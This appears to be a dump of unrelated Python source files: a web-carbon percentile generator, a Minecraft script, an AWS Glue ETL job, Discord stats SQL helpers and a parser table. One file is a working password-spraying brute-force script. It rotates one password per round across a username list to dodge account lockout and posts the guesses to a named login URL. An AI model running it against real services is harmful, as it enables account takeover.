    Uses linear interpolation between the two nearest ranks (the same
    default method as numpy.percentile).  *percentile* is clamped to the
    0-100 range.  *arr* must be non-empty and already sorted ascending;
    its elements are coerced with float().
    """
    percentile = min(100, max(0, percentile))
    # Fractional rank into the array, in [0, len(arr)-1].
    index = (percentile / 100) * (len(arr) - 1)
    lower = math.floor(index)
    fraction = index - lower
    value = float(arr[lower])
    # Interpolate toward the next element only when the rank is fractional.
    # (The original had a dead 'else: value += 0' branch and reused the
    # 'percentile' parameter name for the result; both cleaned up.)
    if fraction > 0:
        value += fraction * (float(arr[lower + 1]) - float(arr[lower]))
    return value
def write(output_filename, content):
    """Write *content* to *output_filename*, overwriting any existing file."""
    with open(output_filename, 'w') as out_file:
        out_file.write(content)
def main(argv):
    """
    WebPerf Core Carbon Percentiles
    Usage:
    * run webperf-core test on all websites you want to use for your percentiles (with json as output file)
    * run this file against your output file, for example like this: carbon-rating.py -i data\carbon-references-2022.json -o tests\energy_efficiency_carbon_percentiles.py
    Options and arguments:
    -h/--help\t\t\t: Help information on how to use script
    -i/--input <file path>\t: input file path (.json)
    -o/--output <file path>\t: output file path (.py)
    """
    output_filename = ''
    input_filename = ''
    langCode = 'en'
    language = False
    # add support for default (en) language
    language = gettext.translation(
        'webperf-core', localedir='locales', languages=[langCode])
    language.install()
    _ = language.gettext
    try:
        opts, args = getopt.getopt(
            argv, "hi:o:", ["help", "input=", "output="])
    except getopt.GetoptError:
        print(main.__doc__)
        sys.exit(2)
    # No options at all: show usage and bail out.
    if (opts.__len__() == 0):
        print(main.__doc__)
        sys.exit(2)
    for opt, arg in opts:
        if opt in ('-h', '--help'): # help
            print(main.__doc__)
            sys.exit(2)
        elif opt in ("-i", "--input"): # input file path
            input_filename = arg
            file_ending = ""
            file_long_ending = ""
            if (len(input_filename) > 4):
                file_ending = input_filename[-4:].lower()
            if (len(input_filename) > 7):
                file_long_ending = input_filename[-7:].lower()
            # Pick the storage engine from the file extension.
            # NOTE(review): read_tests is only imported in the json branch,
            # so sqlite/csv/xml inputs will fail at the read_tests() call
            # below -- confirm whether those engines also export read_tests.
            if file_long_ending == ".sqlite":
                from engines.sqlite import read_sites, add_site, delete_site
            elif (file_ending == ".csv"):
                from engines.csv import read_sites, add_site, delete_site
            elif (file_ending == ".xml"): # https://example.com/sitemap.xml
                from engines.sitemap import read_sites, add_site, delete_site
            else:
                from engines.json import read_tests, read_sites, add_site, delete_site
            pass
        elif opt in ("-o", "--output"): # output file path
            output_filename = arg
            pass
    tests = read_tests(input_filename, 0, -1)
    generated_date = False
    co2s = list()
    for test in tests:
        # Use the date of the first test row as the generation date.
        if not generated_date:
            generated_date = datetime.fromisoformat(
                test[FIELD_INDEX_DATE]).strftime('%Y-%m-%d')
        # Rows store data as single-quoted pseudo-JSON; normalize and parse.
        str_data = test[FIELD_INDEX_DATA].replace('\'', '"')
        data = json.loads(str_data)
        print(str_data)
        co2s.append(data['co2'])
    if not generated_date:
        generated_date = datetime.today().strftime('%Y-%m-%d')
    # Emit a small Python module with the generation date and the 100
    # percentile values of the collected co2 figures.
    output_content = "# This array was last generated with carbon-rating.py on {0}\n".format(
        generated_date)
    output_content += "def get_generated_date():\n"
    output_content += "\treturn '{0}'\n".format(
        generated_date)
    output_content += "\n"
    output_content += "def get_percentiles():\n"
    output_content += "\treturn [\n"
    co2s_sorted = sorted(co2s)
    intervals = list()
    index = 1
    while (index <= 100):
        percentile = getPercentile(co2s_sorted, index)
        intervals.append(percentile)
        position = index - 1
        if index < 100:
            # Marker comment every tenth entry; last entry gets no comma.
            if position % 10 == 0 and position != 0:
                output_content += "\t\t# {0} percentile\n".format(position)
            output_content += "\t\t{0},\n".format(percentile)
        else:
            output_content += "\t\t{0}\n".format(percentile)
        index += 1
    output_content += "\t]"
    print(output_content)
    if (len(output_filename) > 0):
        write(output_filename, output_content)
"""
If file is executed on itself then call a definition, mostly for testing purposes
"""
if __name__ == '__main__':
main(sys.argv[1:])
|
7,978 | a2e00af84f743e949b53840ae6d5509e08935486 | from mcpi.minecraft import Minecraft
import random,time
# BUG FIX: 'mc' was used below but never created, so the loop crashed with
# NameError on the first iteration.  Connect to the local Minecraft server.
mc = Minecraft.create()

# Leave a randomly-coloured flower (block id 38) one block behind the
# player, roughly every 10 ms, forever.
while True:
    x, y, z = mc.player.getTilePos()
    color = random.randrange(0, 9)
    mc.setBlock(x, y, z - 1, 38, color)
    time.sleep(0.01)
|
7,979 | 94286fc36e06598b9faa65d9e5759f9518e436c6 | import argparse
import requests
from ba_bypass_bruteforce import bruteforce, stop_brute, success_queue, dict_queue, success_username
from random import choice
from time import sleep
MAX_ROUND = 3 # 爆破的轮数
curr_round = 0 # 当前的轮数
sleep_time = 2 # 每一轮休眠的秒数
def login_limit_user():
    """Pop one (username, password) pair from dict_queue and try it against
    the login endpoint; record successful credentials in success_queue.

    Intended to be called concurrently by the bruteforce worker threads.
    """
    try:
        login_info = dict_queue.get(block=False)
    except Exception as e:
        # Queue exhausted (or another get() failure): nothing left to try.
        print("[Error] {0}".format(repr(e)))
        return
    username = login_info[0]
    # Skip usernames whose password has already been cracked.
    if username in success_username:
        return
    password = login_info[1]
    # Attempt the login.
    payload = {
        "username": username,
        "password": password,
    }
    print('开始尝试用户名:{},密码:{}'.format(username,password))
    # url = "http://127.0.0.1:8000/user/login-block-account/?referer=/"
    url = "http://ss.gentlecp.com:40000/user/login-block-account/?referer=/"
    r = requests.post(url, data=payload)
    # Check whether the login succeeded.
    if r.status_code == 200:
        msg = login_info
        success_str = "欢迎访问GentleCP的网站"
        if success_str in r.text:
            # On success, store the credentials in success_queue ...
            success_queue.put(msg)
            # ... and remember the username so its remaining passwords are skipped.
            success_username.append(username)
            print("[INFO] success: ", msg)
            # To stop the whole brute force after the first hit, call
            # stop_brute() here; leave it commented out to keep going.
            # stop_brute()
def get_dict(dict_user, dict_pass):
    """Fill dict_queue with (username, password) pairs for the current round.

    Each round pairs EVERY username with a single password, chosen by
    rotating through the password list with the module-level curr_round.
    *dict_user* / *dict_pass* are filenames under the 'dict/' directory.
    """
    with open("dict/{}".format(dict_user)) as f:
        username = [line.strip() for line in f.readlines()]
    with open('dict/{}'.format(dict_pass)) as f:
        passwords = [line.strip() for line in f.readlines()]
    count = 0
    for u in username:
        # Use the next password on each round (wraps around the list).
        p = passwords[curr_round % len(passwords)]
        count += 1
        pair = (u, p)
        dict_queue.put(pair)
    print("字典生成完成,长度 {}".format(count))
def get_parse() -> dict:
    """Parse the command-line options and return them as a plain dict.

    The values are stored under the argparse dest names 'username' and
    'password'.
    """
    parser = argparse.ArgumentParser()
    parser.add_argument("--username", "-u", help="用户名字典")
    parser.add_argument("--password", "-p", help="密码字典")
    return vars(parser.parse_args())
def print_result():
    """Drain success_queue and print every cracked credential pair."""
    cracked = []
    while not success_queue.empty():
        cracked.append(success_queue.get())
    print("\n[INFO] 爆破结果: ", cracked)
if __name__ == "__main__":
args = get_parse()
dict_username = args.get('dict_username', "username.txt")
dict_password = args.get('dict_password', "password.txt")
for curr_round in range(0, MAX_ROUND):
print("[INFO] 开始第{0}轮爆破".format(curr_round))
get_dict(dict_username, dict_password)
bruteforce(login_limit_user, thread_num=5)
print("[INFO] Sleep.")
sleep(2)
print_result()
|
7,980 | fcccbc8d582b709aa27500ef28d86103e98eee4c | # Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
# SPDX-License-Identifier: MIT-0
#
# This code is sample only. Not for use in production.
#
# Author: Babu Srinivasan
# Contact: babusri@amazon.com, babu.b.srinivasan@gmail.com
#
# Spark Streaming ETL script
# Input:
# 1/ Kinesis Data Stream source (via AWS Glue Table)
# 2/ Time interval (for Amazon Lookout for Metrics)
# Output:
# 1/ Streaming data (selected columns only) organized by time interval
# Processing:
# 1/ Micro-batch streaming data by time interval
# 2/ Select user specified columns (dimensions & measures) and event_timestamp
# 3/ Output data to S3 sink (organized using S3 prefixes that contains timestamp)
import sys
from awsglue.transforms import *
from awsglue.utils import getResolvedOptions
from pyspark.context import SparkContext
from awsglue.context import GlueContext
from awsglue.job import Job
from awsglue import DynamicFrame
import datetime
args = getResolvedOptions(sys.argv, [
"JOB_NAME",
"srcDBName",
"srcTableName",
"srcFormat",
"l4mBucket",
"l4mBucketPrefix",
"l4mInterval"])
sc = SparkContext()
glueContext = GlueContext(sc)
spark = glueContext.spark_session
job = Job(glueContext)
job.init(args['JOB_NAME'], args)
# Glue Job parameters - specified in cdk.json during stack deployment
bucketname = args["l4mBucket"]
bucketprefix = args["l4mBucketPrefix"]
glue_dbname = args["srcDBName"]
glue_tablename = args["srcTableName"]
src_format = args["srcFormat"]
l4m_interval = int(args["l4mInterval"]) # in minutes
s3path_data = "s3://" + bucketname + "/" + bucketprefix + "/data/"
s3path_chkpt = "s3://" + bucketname + "/" + bucketprefix + "/checkpoint/"
DELTA_MINS = datetime.timedelta(minutes=l4m_interval)
TEMP_TS = datetime.datetime.strptime("1970-01-01 00:00:00", "%Y-%m-%d %H:%M:%S")
BATCH_WIN_SIZE = str(l4m_interval) + " minutes"
# Function to populate time interval based on Event Timestamp.
# This is equivalent to built-in STEP() function in Kinesis Data Analytics SQL application
def populateTimeInterval(rec):
    """Bucket rec['event_time'] into the configured interval and stamp it.

    Adds 'intvl_date' (yyyy-mm-dd) and 'intvl_hhmm' (HHMM) fields derived
    from the start of the interval containing the event timestamp -- the
    equivalent of the built-in STEP() function in Kinesis Analytics SQL.
    Returns the mutated record.
    """
    elapsed_intervals = (rec['event_time'] - TEMP_TS) // DELTA_MINS
    bucket_start = TEMP_TS + elapsed_intervals * DELTA_MINS
    rec['intvl_date'] = bucket_start.strftime("%Y-%m-%d")
    rec['intvl_hhmm'] = bucket_start.strftime("%H%M")
    return rec
# Main processing logic - called from main for each micro-batch of window size determined by time interval
def processBatch(data_frame, batchId):
if (data_frame.count() > 0):
# Convert Data frame to Glue Dynamic Frame and select only dimensions & measures that will be used by Anomaly detection
datasource0 = DynamicFrame.fromDF(data_frame, glueContext, "from_data_frame").select_fields(['marketplace','event_time', 'views'])
# Populate time interval (yyyy-mm-dd & HHMM)
datasource1 = Map.apply(frame=datasource0, f=populateTimeInterval)
# datasource1.printSchema()
# Write the dynamic frame to S3 sink with prefix constructed from time interval
path_datasink1 = s3path_data
datasink1 = glueContext.write_dynamic_frame.from_options(frame = datasource1, connection_type = "s3", \
connection_options = {"path": path_datasink1, "partitionKeys": ["intvl_date", "intvl_hhmm"]}, \
format_options={"quoteChar": -1, "timestamp.formats": "yyyy-MM-dd HH:mm:ss"}, \
format = src_format, transformation_ctx = "datasink1")
#### Main
data_frame_datasource0 = glueContext.create_data_frame.from_catalog(stream_batch_time = BATCH_WIN_SIZE, \
database = glue_dbname, table_name = glue_tablename, transformation_ctx = "datasource0", \
additional_options = {"startingPosition": "TRIM_HORIZON", "inferSchema": "false"})
data_frame_datasource0.printSchema()
glueContext.forEachBatch(frame = data_frame_datasource0, batch_function = processBatch, \
options = {"windowSize": BATCH_WIN_SIZE, "checkpointLocation": s3path_chkpt})
job.commit() |
7,981 | ce7b7980d1e93f23e7e3ef048ddadc0c779ef9ce | import os
import telebot
# Create the bot using the token from the environment, falling back to the
# literal placeholder 'TOKEN' when the variable is unset.
# NOTE(review): 'TELEGRAM_ACCESS_TOCKEN' looks misspelled ('TOCKEN'); kept
# as-is because existing deployments may already set it under this name.
bot = telebot.TeleBot(os.environ.get('TELEGRAM_ACCESS_TOCKEN',
                                     'TOKEN'))
|
7,982 | 19ff064f8c27b9796eb435c7d2b9ebf87ee90ad6 | from time import strftime
from Stats.SQL.Compteur import compteurSQL
from Stats.SQL.Rapports import rapportsSQL
from Stats.SQL.Daily import dailySQL
from Stats.SQL.CompteurP4 import compteurJeuxSQL
from Stats.SQL.Historique import histoSQL, histoSQLJeux
from Stats.SQL.ConnectSQL import connectSQL
tableauMois={"01":"janvier","02":"février","03":"mars","04":"avril","05":"mai","06":"juin","07":"juillet","08":"aout","09":"septembre","10":"octobre","11":"novembre","12":"décembre","TO":"TOTAL"}
def exeClassic(count,id,nom,curseurGuild,guild):
    """Update per-user counters for stat *nom* (Messages, Voice, Emotes,
    Reactions, ...) at monthly, yearly and global granularity, then refresh
    the daily aggregates and report tables.

    NOTE(review): table names and IDs are interpolated into SQL with
    str.format -- assumed safe because they are numeric IDs and fixed
    names, but verify no user-controlled text ever reaches them.
    """
    # Numeric date key yymmdd used by daily/report tables.
    dateID=int(strftime("%y")+strftime("%m")+strftime("%d"))
    connexionGL,curseurGL=connectSQL(guild.id,nom,"Stats","GL","")
    # Month table (e.g. 'janvier24' via tableauMois).
    connexion,curseur=connectSQL(guild.id,nom,"Stats",strftime("%m"),strftime("%y"))
    compteurSQL(curseur,tableauMois[strftime("%m")]+strftime("%y"),id,(0,id,strftime("%m"),strftime("%y"),count,0),count,(strftime("%d"),strftime("%m"),strftime("%y")),(strftime("%m"),strftime("%y")),"persoM",False,True,1,curseurGL)
    connexion.commit()
    # Year-to-date table ('toYY').
    connexion,curseur=connectSQL(guild.id,nom,"Stats","TO",strftime("%y"))
    compteurSQL(curseur,"to"+strftime("%y"),id,(0,id,"TO",strftime("%y"),count,0),count,(strftime("%d"),strftime("%m"),strftime("%y")),("TO",strftime("%y")),"persoA",False,True,1,curseurGL)
    connexion.commit()
    # All-time table; compteurSQL returns the ranking list used for pruning.
    liste=compteurSQL(curseurGL,"glob",id,(0,id,"TO","GL",count,0),count,(strftime("%d"),strftime("%m"),strftime("%y")),("TO","GL"),"persoA",False,True,1,curseurGL)
    if nom in ("Messages","Voice"):
        # Server-wide per-day counter keyed by yymmdd.
        compteurSQL(curseurGL,"dayRank",int(strftime("%y")+strftime("%m")+strftime("%d")),(0,int(strftime("%y")+strftime("%m")+strftime("%d")),strftime("%d"),strftime("%m"),strftime("%y"),count),count,None,None,None,None,False,3,curseurGL)
    if nom in ("Emotes","Reactions"):
        # NOTE(review): countGL is fetched but never used -- confirm intent.
        countGL=curseurGL.execute("SELECT Count FROM glob WHERE ID={0}".format(id)).fetchone()["Count"]
        # Prune per-user history tables for users ranked below 400.
        for i in liste:
            if i["Rank"]>400:
                curseurGL.execute("DROP TABLE IF EXISTS persoM{0}".format(i["ID"]))
                curseurGL.execute("DROP TABLE IF EXISTS persoA{0}".format(i["ID"]))
    connexionGL.commit()
    dailySQL(dateID,(strftime("%d"),strftime("%m"),strftime("%y")),nom,curseurGuild,guild.id,"Stats")
    if nom not in ("Mentions","Mentionne"):
        rapportsSQL(guild,"ranks",id,None,count,(0,id,strftime("%d"),strftime("%m"),strftime("%y"),dateID,count,nom),strftime("%d"),strftime("%m"),strftime("%y"),nom)
def exeObj(count,idObj,id,obj,guild,nom):
    """Update counters for stat *nom* broken down by object *idObj* (emote,
    channel, mentioned user, ...) for user *id*, pruning low-traffic
    per-object tables for Emotes/Reactions as it goes."""
    # Numeric date key yymmdd for the report tables.
    dateID=int(strftime("%y")+strftime("%m")+strftime("%d"))
    connexionGL,curseurGL=connectSQL(guild.id,nom,"Stats","GL","")
    # Month table for this object.
    connexion,curseur=connectSQL(guild.id,nom,"Stats",strftime("%m"),strftime("%y"))
    compteurSQL(curseur,tableauMois[strftime("%m")]+strftime("%y")+str(idObj),id,(0,id,idObj,strftime("%m"),strftime("%y"),count),count,(strftime("%d"),strftime("%m"),strftime("%y")),(strftime("%m"),strftime("%y")),"persoM",obj,False,2,curseurGL)
    # Drop monthly per-object tables with fewer than 10 uses (Emotes/Reactions only).
    if nom in ("Emotes","Reactions") and curseur.execute("SELECT Count FROM {0}{1} WHERE ID={2}".format(tableauMois[strftime("%m")],strftime("%y"),idObj)).fetchone()["Count"]<10:
        curseur.execute("DROP TABLE {0}{1}{2}".format(tableauMois[strftime("%m")],strftime("%y"),idObj))
    connexion.commit()
    # Year-to-date table for this object.
    connexion,curseur=connectSQL(guild.id,nom,"Stats","TO",strftime("%y"))
    compteurSQL(curseur,"to"+strftime("%y")+str(idObj),id,(0,id,idObj,"TO",strftime("%y"),count),count,(strftime("%d"),strftime("%m"),strftime("%y")),("TO",strftime("%y")),"persoA",obj,False,2,curseurGL)
    # Drop yearly per-object tables with fewer than 25 uses.
    if nom in ("Emotes","Reactions") and curseur.execute("SELECT Count FROM to{0} WHERE ID={1}".format(strftime("%y"),idObj)).fetchone()["Count"]<25:
        curseur.execute("DROP TABLE to{0}{1}".format(strftime("%y"),idObj))
    connexion.commit()
    # All-time table for this object; returns the ranking list.
    liste=compteurSQL(curseurGL,"glob"+str(idObj),id,(0,id,idObj,"TO","GL",count),count,(strftime("%d"),strftime("%m"),strftime("%y")),("TO","GL"),"persoA",obj,False,2,curseurGL)
    if nom in ("Emotes","Reactions"):
        # Prune the object's global table below 50 total uses, and the
        # per-user tables when the object is ranked below 400.
        if curseurGL.execute("SELECT Count FROM glob WHERE ID={0}".format(idObj)).fetchone()["Count"]<50:
            curseurGL.execute("DROP TABLE glob{0}".format(idObj))
        if curseurGL.execute("SELECT Rank FROM glob WHERE ID={0}".format(idObj)).fetchone()["Rank"]>400:
            for i in liste:
                curseurGL.execute("DROP TABLE IF EXISTS persoM{0}{1}".format(i["ID"],idObj))
                curseurGL.execute("DROP TABLE IF EXISTS persoA{0}{1}".format(i["ID"],idObj))
    connexionGL.commit()
    if nom not in ("Mentions","Mentionne"):
        rapportsSQL(guild,"objs",idObj,id,count,(0,id,idObj,strftime("%d"),strftime("%m"),strftime("%y"),dateID,count,nom),strftime("%d"),strftime("%m"),strftime("%y"),nom)
def exeJeuxSQL(id, idObj, state, guild, curseurGuild, count, option, tours):
    """Record one game result (win or loss) across all stat tables.

    Updates the monthly, yearly and global counters for the player (and,
    when an opponent/object id is given, the per-opponent counters),
    appends the game to the history table, then bumps the daily counter.

    Parameters:
        id: player identifier.
        idObj: opponent/object identifier, or None when not applicable.
        state: "W" for a win, "L" for a loss.
        guild: guild identifier used to locate the databases.
        curseurGuild: cursor on the guild database, forwarded to dailySQL.
        count: unused here; kept for call-site compatibility.
        option: game name selecting the "Jeux" table family.
        tours: turn/round data stored by histoSQLJeux.
    """
    # Points delta and win/loss column increments for this outcome.
    dictCount = {"W": 2, "L": -1}
    dictW = {"W": 1, "L": 0}
    dictL = {"W": 0, "L": 1}
    w, l, pts = dictW[state], dictL[state], dictCount[state]
    # Snapshot the date ONCE: the original called strftime() dozens of
    # times, so a call straddling a day/month rollover could write
    # inconsistent dates into the monthly/yearly/global tables.
    d, m, y = strftime("%d"), strftime("%m"), strftime("%y")
    connexionGL, curseurGL = connectSQL(guild, option, "Jeux", "GL", "")
    # Monthly tables.
    connexion, curseur = connectSQL(guild, option, "Jeux", m, y)
    compteurJeuxSQL(curseur, tableauMois[m] + y, id,
                    (0, id, m, y, w, l, pts, 0), pts,
                    (d, m, y), (m, y), "persoM", False, state, 4, curseurGL)
    if idObj is not None:
        compteurJeuxSQL(curseur, tableauMois[m] + y + str(idObj), id,
                        (0, id, idObj, m, y, w, l, pts, 0), pts,
                        (d, m, y), (m, y), "persoM", True, state, 5, curseurGL)
    connexion.commit()
    # Yearly ("TO") tables.
    connexion, curseur = connectSQL(guild, option, "Jeux", "TO", y)
    compteurJeuxSQL(curseur, "to" + y, id,
                    (0, id, "TO", y, w, l, pts, 0), pts,
                    (d, m, y), ("TO", y), "persoA", False, state, 4, curseurGL)
    if idObj is not None:
        compteurJeuxSQL(curseur, "to" + y + str(idObj), id,
                        (0, id, idObj, "TO", y, w, l, pts, 0), pts,
                        (d, m, y), ("TO", y), "persoA", True, state, 5, curseurGL)
    connexion.commit()
    # Global tables.
    compteurJeuxSQL(curseurGL, "glob", id,
                    (0, id, "TO", "GL", w, l, pts, 0), pts,
                    (d, m, y), ("TO", "GL"), "persoA", False, state, 4, curseurGL)
    if idObj is not None:
        compteurJeuxSQL(curseurGL, "glob" + str(idObj), id,
                        (0, id, idObj, "TO", "GL", w, l, pts, 0), pts,
                        (d, m, y), ("TO", "GL"), "persoA", True, state, 5, curseurGL)
    # Game history, keyed by a dd/mm/yy date string.
    histoSQLJeux(curseurGL, id, tours, d + "/" + m + "/" + y, idObj, state)
    connexionGL.commit()
    # Daily counter uses a yymmdd integer key.
    dailySQL(int(y + m + d), (d, m, y), option, curseurGuild, guild, "Jeux")
7,983 | 160f272edd8283ea561552f22c71967db4a1660a |
# parsetab.py
# This file is automatically generated. Do not edit.
# pylint: disable=W,C,R
_tabversion = '3.10'
_lr_method = 'LALR'
_lr_signature = 'AND BREAK CHAR COLON COMA CTE_F CTE_I CTE_STRING DETERMINANT DIFFERENT DIVIDE DO DOUBLEEQUAL ELSE EQUAL FLOAT FROM FUNCTION ID IF INPUT INT INVERSA LBRACE LCORCH LOWEREQUAL LOWERTHAN LPAREN MAIN MINUS MOREEQUAL MORETHAN OR PLUS PRINT PROGRAM RBRACE RCORCH RETURN RPAREN SEMICOLON TIMES TO TRANSPUESTA VAR VOID WHILEprogram : PROGRAM ID COLON varsGlobal function main endPrograma\n | PROGRAM ID COLON function main endPrograma\n | PROGRAM ID COLON varsGlobal main endPrograma\n | PROGRAM ID COLON main endPrograma\n endPrograma :varsGlobal : VAR varAuxGlobal1\n varAuxGlobal1 : tipo varAuxGlobal2 SEMICOLON\n | tipo varAuxGlobal2 SEMICOLON varAuxGlobal1\n varAuxGlobal2 : ID\n | ID COMA varAuxGlobal2\n | ID LCORCH CTE_I RCORCH\n | ID LCORCH CTE_I RCORCH COMA varAuxGlobal2\n | ID LCORCH CTE_I RCORCH LCORCH CTE_I RCORCH\n | ID LCORCH CTE_I RCORCH LCORCH CTE_I RCORCH COMA varAuxGlobal2\n main : nomMain LPAREN RPAREN LBRACE bloqueAux RBRACE\n | nomMain LPAREN RPAREN LBRACE vars bloqueAux RBRACE\n | nomMain LPAREN RPAREN LBRACE llamadaAFuncion RBRACE\n nomMain : MAIN\n vars : VAR varAux1\n varAux1 : tipo varAux2 SEMICOLON\n | tipo varAux2 SEMICOLON varAux1\n varAux2 : ID push_var\n | ID push_var COMA varAux2\n | ID LCORCH CTE_I RCORCH push_arreglo\n | ID LCORCH CTE_I RCORCH push_arreglo COMA varAux2\n | ID LCORCH CTE_I RCORCH LCORCH CTE_I RCORCH push_matriz\n | ID LCORCH CTE_I RCORCH LCORCH CTE_I RCORCH push_matriz COMA varAux2\n push_var :push_arreglo :push_matriz :tipo : INT\n | FLOAT\n | CHAR\n tipoFunc : INT\n | FLOAT\n | CHAR\n | VOID\n bloque : LBRACE RBRACE\n | LBRACE bloqueAux RBRACE\n function : FUNCTION tipoFunc nomFunc LPAREN RPAREN LBRACE functionReturn RBRACE endProc\n | FUNCTION tipoFunc nomFunc LPAREN RPAREN LBRACE vars bloqueAux functionReturn RBRACE endProc\n | FUNCTION tipoFunc nomFunc LPAREN RPAREN LBRACE functionReturn RBRACE endProc function \n | FUNCTION tipoFunc nomFunc LPAREN RPAREN LBRACE vars bloqueAux functionReturn RBRACE endProc 
function\n | FUNCTION tipoFunc nomFunc LPAREN RPAREN LBRACE bloqueAux functionReturn RBRACE endProc\n | FUNCTION tipoFunc nomFunc LPAREN RPAREN LBRACE bloqueAux functionReturn RBRACE endProc function\n | FUNCTION tipoFunc nomFunc LPAREN param RPAREN LBRACE functionReturn RBRACE endProc \n | FUNCTION tipoFunc nomFunc LPAREN param RPAREN LBRACE bloqueAux functionReturn RBRACE endProc\n | FUNCTION tipoFunc nomFunc LPAREN param RPAREN LBRACE bloqueAux functionReturn RBRACE endProc function\n | FUNCTION tipoFunc nomFunc LPAREN param RPAREN LBRACE vars bloqueAux functionReturn RBRACE endProc\n | FUNCTION tipoFunc nomFunc LPAREN param RPAREN LBRACE functionReturn RBRACE endProc function\n | FUNCTION tipoFunc nomFunc LPAREN param RPAREN LBRACE vars bloqueAux functionReturn RBRACE endProc function\n functionReturn : RETURN exp creaCuadReturn SEMICOLON\n | empty\n creaCuadReturn :\n endProc :\n param : tipo ID paramAvarTable\n | tipo ID paramAvarTable COMA param\n | empty\n paramAvarTable : empty : \n push_function :nomFunc : ID push_function\n bloqueAux : estatuto\n | estatuto bloqueAux\n while : WHILE while1 LPAREN expresion RPAREN while2 LBRACE bloqueAux RBRACE while3\n while1 :while2 :while3 :loopFromDo : FROM LPAREN ID EQUAL expresion RPAREN TO LPAREN expresion RPAREN DO LBRACE bloqueAux RBRACE\n estatuto : asignacion\n | condicion\n | escritura\n | while\n | loopFromDo\n | comparacion\n | llamadaAFuncion SEMICOLON\n | lectura\n | BREAK generaCuadbreak SEMICOLON\n | transpuesta\n | inversa\n transpuesta : ID push_id TRANSPUESTA creaTrans SEMICOLON\n inversa : ID push_id INVERSA creaInversa SEMICOLON\n creaInversa : creaTrans : generaCuadbreak : llamadaAFuncion : ID actualizaFuncion generarEra LPAREN paramFuncion gosub RPAREN expresion\n | ID actualizaFuncion generarEra LPAREN paramFuncion gosub RPAREN\n actualizaFuncion : gosub :\n generarEra :\n paramFuncion : ID push_id2 paramFuncionAux\n | ID push_id2 paramFuncionAux COMA paramFuncion\n | exp paramFuncionAux\n | exp 
paramFuncionAux COMA paramFuncion\n | empty\n paramFuncionAux : push_id2 :arreglo : ID push_id LCORCH exp RCORCH ver_dim1\n matrix : ID push_id LCORCH exp RCORCH LCORCH exp RCORCH ver_dim2\n ver_dim2 : asignacion : ID push_id EQUAL push_poper expresion create_asign SEMICOLON\n | arreglo EQUAL push_poper exp create_asign SEMICOLON\n | matrix EQUAL push_poper exp create_asign SEMICOLON\n | ID push_id EQUAL push_poper llamadaAFuncion create_asign SEMICOLON\n | ID push_id EQUAL push_poper determinante SEMICOLON\n determinante : ID push_id DETERMINANT\n push_id_dimensionada :create_asign_dim :ver_dim1 :create_asign :comparacion : ID push_id DOUBLEEQUAL push_poper expresion SEMICOLON\n condicion : IF LPAREN expresion RPAREN cond bloque condFinal\n | IF LPAREN expresion RPAREN cond bloque ELSE condElse bloque condFinal\n cond :condElse :condFinal :escritura : PRINT push_poper LPAREN escrituraAux RPAREN quad_print SEMICOLON\n | PRINT push_poper LPAREN llamadaAFuncion RPAREN quad_print SEMICOLON\n lectura : INPUT push_poper LPAREN ID push_id RPAREN quad_print SEMICOLON\n quad_print :escrituraAux : expresion\n | CTE_STRING push_cte\n | expresion COMA escrituraAux\n | CTE_STRING push_cte COMA escrituraAux\n | llamadaAFuncion\n expresion : exp\n | exp comp exp quad_comp\n comp : LOWERTHAN push_poper\n | MORETHAN push_poper\n | DIFFERENT push_poper\n | DOUBLEEQUAL push_poper\n | LOWEREQUAL push_poper\n | MOREEQUAL push_poper\n quad_comp :exp : termino quad_term\n | termino quad_term exp1\n exp1 : PLUS push_poper exp\n | MINUS push_poper exp\n quad_term :quad_fact :termino : factor quad_fact\n | factor quad_fact termino1\n termino1 : TIMES push_poper termino\n | DIVIDE push_poper termino\n factor : LPAREN expresion RPAREN\n | factorAux\n factorAux : PLUS push_poper var_cte\n | MINUS push_poper var_cte\n | var_cte \n push_id :push_cte :push_poper :var_cte : ID push_id\n | CTE_I push_cte\n | CTE_F push_cte\n | CTE_STRING push_cte\n | arreglo\n | matrix\n '
_lr_action_items = {'MOREEQUAL':([106,107,108,110,112,113,114,115,117,119,120,144,146,150,153,154,155,156,158,190,195,198,199,201,203,218,219,257,258,276,277,278,279,305,315,],[-149,-157,-139,-158,-140,-151,-151,-151,-150,160,-146,-151,-150,-135,-141,-155,-156,-154,-153,-156,-136,-148,-147,-142,-145,-109,-150,-98,-153,-137,-138,-144,-143,-100,-99,]),'CTE_STRING':([78,80,82,95,103,104,105,109,111,116,124,126,127,131,151,152,160,161,162,163,164,165,166,171,174,176,177,191,196,197,200,202,205,206,207,208,210,211,239,245,246,247,248,256,291,293,307,309,],[-152,-152,114,114,114,144,114,-152,-152,114,-152,114,-152,114,114,114,-152,-152,-152,-152,114,-152,-152,114,114,114,114,144,-152,-152,-152,-152,-133,-130,-131,-128,-132,-129,144,114,114,114,114,114,114,114,114,114,]),'LCORCH':([34,57,75,86,94,117,122,146,158,218,219,226,252,258,],[40,-150,-150,126,133,-150,168,-150,126,256,-150,-150,284,126,]),'RETURN':([50,52,53,54,58,61,62,66,67,68,72,81,89,99,100,132,136,141,185,217,223,238,244,250,255,261,274,275,280,282,289,290,300,304,312,318,319,322,328,],[-63,-77,-79,-71,-74,-70,-80,-73,-75,-72,95,-64,-76,95,95,-78,95,95,95,-82,-81,-102,-103,-116,-111,-105,-117,-118,-38,-112,-101,-104,-39,-119,-116,-68,-113,-65,-69,]),'DO':([321,],[324,]),'VOID':([5,],[13,]),'EQUAL':([47,49,57,75,86,130,218,257,305,315,],[78,80,-150,-150,127,177,-109,-98,-100,-99,]),'CHAR':([5,10,35,39,55,142,167,],[15,25,25,25,25,25,25,]),'VAR':([4,37,72,100,],[10,55,55,55,]),'WHILE':([37,46,50,52,53,54,58,61,62,66,67,68,72,84,89,96,100,132,139,167,212,217,223,238,244,249,250,255,261,274,275,280,282,289,290,295,300,304,312,318,319,322,326,328,],[63,63,63,-77,-79,-71,-74,-70,-80,-73,-75,-72,63,-19,-76,63,63,-78,63,-20,-21,-82,-81,-102,-103,63,-116,-111,-105,-117,-118,-38,-112,-101,-104,63,-39,-119,-116,-68,-113,-65,63,-69,]),'PROGRAM':([0,],[2,]),'PRINT':([37,46,50,52,53,54,58,61,62,66,67,68,72,84,89,96,100,132,139,167,212,217,223,238,244,249,250,255,261,274,275,280,282,289,290,295,300,304,312,318,319,322,326,3
